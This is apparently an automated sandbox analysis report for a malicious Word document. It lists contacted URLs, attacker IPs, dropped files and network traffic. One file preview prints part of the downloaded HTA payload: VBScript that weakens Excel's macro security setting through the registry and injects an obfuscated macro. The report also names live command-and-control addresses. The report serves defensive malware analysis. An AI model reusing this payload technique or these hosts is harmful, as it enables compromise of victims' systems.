https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://autodiscover-s.outlook.com/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://roaming.edog.	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://cdn.entity.	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://powerlift.acompli.net	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://cortana.ai	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://api.aadrm.com/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://api.microsoftstream.com/api/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://cr.office.com	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	Avira URL Cloud: safe	low
http://159.75.135.162:61256/dllhost.htaindowsINetCookiesF&	mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://portal.office.com/account/?ref=ClientMeControl	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://graph.ppe.windows.net	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://tasks.office.com	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://officeci.azurewebsites.net/api/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
http://159.75.135.162:61256/dllhost.htaV	mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.office.cn/addinstemplate	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
http://159.75.135.162:61256/dllhost.htaY	mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.aadrm.com	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://106.55.17.200:62002/	rundll32.exe, 0000001E.00000002.556713488.0000000002DDA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://globaldisco.crm.dynamics.com	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://messaging.engagement.office.com/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://dev0-api.acompli.net/autodetect	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://www.odwebp.svc.ms	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://api.diagnosticssdf.office.com/v2/feedback	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://api.powerbi.com/v1.0/myorg/groups	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://web.microsoftstream.com/video/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
http://159.75.135.162:61256/dllhost.htag	mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dataservice.o365filtering.com/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
http://159.75.135.162:61256/dllhost.htaET4.C:	mshta.exe, 00000019.00000002.559444903.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://officesetup.getmicrosoftkey.com	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://ncus.contentsync.	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
http://weather.service.msn.com/data.aspx	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://apis.live.net/v5.0/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://messaging.lifecycle.office.com/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://management.azure.com	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://outlook.office365.com	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://wus2.contentsync.	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://api.office.net	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://incidents.diagnosticssdf.office.com	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://106.55.17.200/	rundll32.exe, 0000001E.00000002.556934937.0000000002E27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://entitlement.diagnostics.office.com	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://substrate.office.com/search/api/v2/init	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://outlook.office.com/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://outlook.office365.com/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://webshell.suite.office.com	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://substrate.office.com/search/api/v1/SearchHistory	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://106.55.17.200:62002/jquery-3.3.1.slim.min.js	rundll32.exe, 0000001E.00000002.556915406.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556560356.0000000002D6B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556713488.0000000002DDA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://management.azure.com/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://messaging.lifecycle.office.com/getcustommessage16	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
159.75.135.162	unknown	China		1257	TELE2EU	false
101.33.231.81	unknown	China		132203	TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	647003
Start date and time: 16/06/202214:18:50	2022-06-16 14:18:50 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	V3g2Pfu707.docx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.expl.evad.winDOCX@18/34@0/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .docx Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): sdiagnhost.exe, mrxdav.sys, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.76.141, 52.109.88.37, 52.109.76.34, 52.109.88.38, 52.109.88.40
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
Execution Graph export aborted for target mshta.exe, PID 5852 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
101.33.231.81	V3g2Pfu707.docx	Get hash	malicious	Browse	101.33.231.81:62563/exploit.html

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	V3g2Pfu707.docx	Get hash	malicious	Browse	101.33.231.81
	Camera Translator Pro_1.1.apk	Get hash	malicious	Browse	162.62.150.165
	Camera Translator Pro_1.1.apk	Get hash	malicious	Browse	170.106.48.121
	i9YeKJfeed	Get hash	malicious	Browse	101.34.175.187
	LFezjVqTgC.exe	Get hash	malicious	Browse	150.109.149.99
	Bk21Qe4LsF.exe	Get hash	malicious	Browse	101.32.224.111
	8nXO11Fvre	Get hash	malicious	Browse	124.156.39.100
	Digitize PDF Scanner_1.0.4.apk	Get hash	malicious	Browse	101.32.92.191
	Digitize PDF Scanner_1.0.4.apk	Get hash	malicious	Browse	101.32.92.198
	A8nzPZ6G6A	Get hash	malicious	Browse	162.63.47.4
	XSH0YkOfjl	Get hash	malicious	Browse	101.34.151.39
	Chat Stickers_1.0.apk	Get hash	malicious	Browse	101.32.92.201
	Chat Stickers_1.0.apk	Get hash	malicious	Browse	101.32.92.198
	com.enos.mobile.newenergy_11881447_50997895.apk	Get hash	malicious	Browse	129.226.103.217
	com.enos.mobile.newenergy_11881447_50997895.apk	Get hash	malicious	Browse	129.226.103.217
	kruma.x86	Get hash	malicious	Browse	101.33.185.236
	wFD89MrGNX	Get hash	malicious	Browse	119.28.5.236
	Mini PDF Scanner_1.1.29_1.apk	Get hash	malicious	Browse	101.32.92.191
	arm	Get hash	malicious	Browse	124.157.170.165
	arm7	Get hash	malicious	Browse	203.205.156.143
TELE2EU	pandora.arm	Get hash	malicious	Browse	80.170.65.232
	NPZ3SWScH6	Get hash	malicious	Browse	91.128.242.163
	xuaw4X8PE7	Get hash	malicious	Browse	90.132.110.35
	Dq86sP9GwM	Get hash	malicious	Browse	83.176.190.193
	ClimaxoilfieldXgescanntes-DokumentX2022.13.06_1044.xls	Get hash	malicious	Browse	91.130.102.123
	52mgI7iOxc	Get hash	malicious	Browse	130.244.102.35
	drLLRNbX4T	Get hash	malicious	Browse	159.75.143.195
	2Kg7m11O2Y	Get hash	malicious	Browse	83.176.89.177
	F9d5ol32UT	Get hash	malicious	Browse	91.131.88.135
	i9YeKJfeed	Get hash	malicious	Browse	159.72.220.16
	vailon.mips	Get hash	malicious	Browse	193.217.5.152
	vailon.arm	Get hash	malicious	Browse	83.183.143.158
	QRJCdtkHy6	Get hash	malicious	Browse	90.144.148.207
	YHQxlHBzZb	Get hash	malicious	Browse	5.240.238.207
	LA13Wfso9K	Get hash	malicious	Browse	83.184.207.70
	lessie.arm	Get hash	malicious	Browse	159.79.180.184
	sO4p2ng9bv	Get hash	malicious	Browse	193.14.162.219
	KyEBxcB74x	Get hash	malicious	Browse	91.130.14.21
	lheJ0BlYag	Get hash	malicious	Browse	91.128.130.0
	gatox86	Get hash	malicious	Browse	83.179.44.222

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.dll	5YMh6S8QVr.docx	Get hash	malicious	Browse
	ZDhoKQk8G6.docx	Get hash	malicious	Browse
	TranQuangDai.docx	Get hash	malicious	Browse
	doc782.docx	Get hash	malicious	Browse
	68101181_048154.img	Get hash	malicious	Browse
	doc782.docx	Get hash	malicious	Browse
	doc1712.docx	Get hash	malicious	Browse
	R346ltaP9w.rtf	Get hash	malicious	Browse
	VIP Invitation to Doha Expo 2023.docx	Get hash	malicious	Browse
	WykHEO9BQN.rtf	Get hash	malicious	Browse
	lol666 (2).bat	Get hash	malicious	Browse
	EISPv0c56U.doc	Get hash	malicious	Browse
	mjpoc_slide.doc	Get hash	malicious	Browse
	mjpoc_slide.doc	Get hash	malicious	Browse
	05-2022-0438.doc	Get hash	malicious	Browse

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Microsoft Access Database
Category:	dropped
Size (bytes):	528384
Entropy (8bit):	0.4747870240005237
Encrypted:	false
SSDEEP:	384:LGfXq/JCQq8SFYfZ0jGB7wAUFgWCQwtZ1IX+hVZO4Fg:ifXqCJHoZJHgTCQ/kI
MD5:	12112B6883306BD90398B9A7656963A9
SHA1:	D1CCC28F7C0EB31D4DA0A482B666BB9F3033BE2E
SHA-256:	028E95FEE1637EA8873C77BBA6E9C7ADC65179D2808AA74E148DB93EC32EF04F
SHA-512:	F5F26D241D3802BD1358126779FBF02DC0BDC381C49B5F6B881FCD33828A7F2D8373D162C8027D20B28CF8590CB76F1591DA74CD80304D114C2AA1ADF33A2539
Malicious:	false
Preview:	....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N>U.7...~.(...`.:{6M...Z.Cw..3..y[.\|..\|......~;...f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	21824
Entropy (8bit):	4.502978783041859
Encrypted:	false
SSDEEP:	192:fgVwLjUJpJf0t59KLKnVTpngGwK69kVaWXO:YVwLjmpJfC59KLKnVTpngGwK69kVaWXO
MD5:	3E55BD78BB922420E76EBAF2F5E13BCE
SHA1:	8E46A458697D4CF862C5B355E0DC4982363E3D15
SHA-256:	2BC598361C057879174A09C0833EF223225124D6745DF5615A7A1A9C6D273F4C
SHA-512:	D91869D5BF46C988915B39D5E6F7A34941333AF3B2C385E089B7662635895A6937D9CC0B3AABB8F76E8723A9034674A19B0E07F492E727950E21F0B698EB3632
Malicious:	false
Yara Hits:	Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\dllhost[1].hta, Author: Arnim Rupp
IE Cache URL:	http://159.75.135.162:61256/dllhost.hta
Preview:	<html><head><script language="vbscript">.Dim objExcel, WshShell, RegPath, action, objWorkbook, xlmodule..Set objExcel = CreateObject("Excel.Application").objExcel.Visible = False..Set WshShell = CreateObject("Wscript.Shell")..function RegExists(regKey)..on error resume next..WshShell.RegRead regKey..RegExists = (Err.number = 0).end function..' Get the old AccessVBOM value.RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & objExcel.Version & "\Excel\Security\AccessVBOM"..if RegExists(RegPath) then..action = WshShell.RegRead(RegPath).else..action = "".end if..' Weaken the target.WshShell.RegWrite RegPath, 1, "REG_DWORD"..' Run the macro.Set objWorkbook = objExcel.Workbooks.Add().Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1).xlmodule.CodeModule.AddFromString "Private "&"Type PRO"&"CESS_INF"&"ORMATION"&Chr(10)&" hPro"&"cess As "&"Long"&Chr(10)&" hThr"&"ead As L"&"ong"&Chr(10)&" dwPr"&"ocessId "&"As Long"&Chr(10)&" dwTh"&"readId A"&"s Long"&Chr(10)& _."End Typ

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
Category:	dropped
Size (bytes):	1364
Entropy (8bit):	4.120422056924814
Encrypted:	false
SSDEEP:	24:H54C9A+gqyIiDKzhHaAhKqmxfII+ycuZhN+akSGPNnq9Wd:ZCffK96iKqmxg1ul+a36q9m
MD5:	CBC4FD42283484CF2D3661E516B43451
SHA1:	B2E7228A493A798BB45DDF1F44ACC49C5C0337CB
SHA-256:	12090443E2B39FCA7099B35FA2E4FB8AFA00B4FFAD3AF0D6B011407C4C51006E
SHA-512:	C02E05CE6AEE4FD0F61B69B93EFF18474037A3CB399989A4A5851234E273794BE2499C02CA063BC03B206B56700F2A32D1C72EB6481BC07ED027C279961F8A4C
Malicious:	false
Preview:	L....b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP.................!...U..... ............4.......C:\Users\user\AppData\Local\Temp\RES55EE.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.p.p.v.b.w.u.l...d.l.l.....(.....L.e.g.a.l.C.o.p.

Process:	C:\Windows\SysWOW64\msdt.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24702
Entropy (8bit):	4.37978533849437
Encrypted:	false
SSDEEP:	96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
MD5:	191959B4C3F91BE170B30BF5D1BC2965
SHA1:	1891E3CB588516B94FDC53794DA4DF5469A4C6D0
SHA-256:	8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
SHA-512:	092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
Malicious:	false
Preview:	<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..

File type:	Microsoft OOXML
Entropy (8bit):	7.997351182794523
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	V3g2Pfu707.docx
File size:	520148
MD5:	b60cd79e2c14dbeefa22197f76fc3437
SHA1:	07a2811a3ea7a4a0c84e52cb5a48f1e712b55fd9
SHA256:	6ddab79a6d836f9c1ed9ab3bbe28a074c0c93bd87f55144ed62b23c0032715d1
SHA512:	3c565f6be03534118eaf0b35221a4962d7ff8b64af3408ec72949809e9fe8e935652e38dbdaff8960c5e5b886e81d1c0014cb4981e5fed153833e6877c8a8b21
SSDEEP:	12288:ZTAhQSKy2e6tLkAPqq/Q62J0yLz+hyXF+uObrp:1AGSs5Dqq/Qvz+hQU1
TLSH:	A6B423F798435185CB2A58BBD80B829BDCF096B724341DD2BCBC24878BC578E4A67527
File Content Preview:	PK...........T-../j...........[Content_Types].xml...j.0.E.....6.J.(.....e.h...4v.......c;5%$64..`..{.Xb...V..\|...d..I..[!M....k.@....LY.9.A ....x.s..T...e.......Y......z."...:..Y..n8.....&... ..3.l.b.........$OMc....+..@.j<.p.a.).Y.:].q@...2T.=a)].`....r:

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 16, 2022 14:20:01.900645018 CEST	49746	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:02.133006096 CEST	62563	49746	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:02.133150101 CEST	49746	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:02.135394096 CEST	49746	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:02.359359980 CEST	62563	49746	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:02.359416008 CEST	62563	49746	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:02.359455109 CEST	62563	49746	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:02.359539032 CEST	49746	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:02.371578932 CEST	49746	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:02.468226910 CEST	49747	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:02.686306000 CEST	62563	49747	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:02.686450005 CEST	49747	62563	192.168.2.3	101.33.231.81
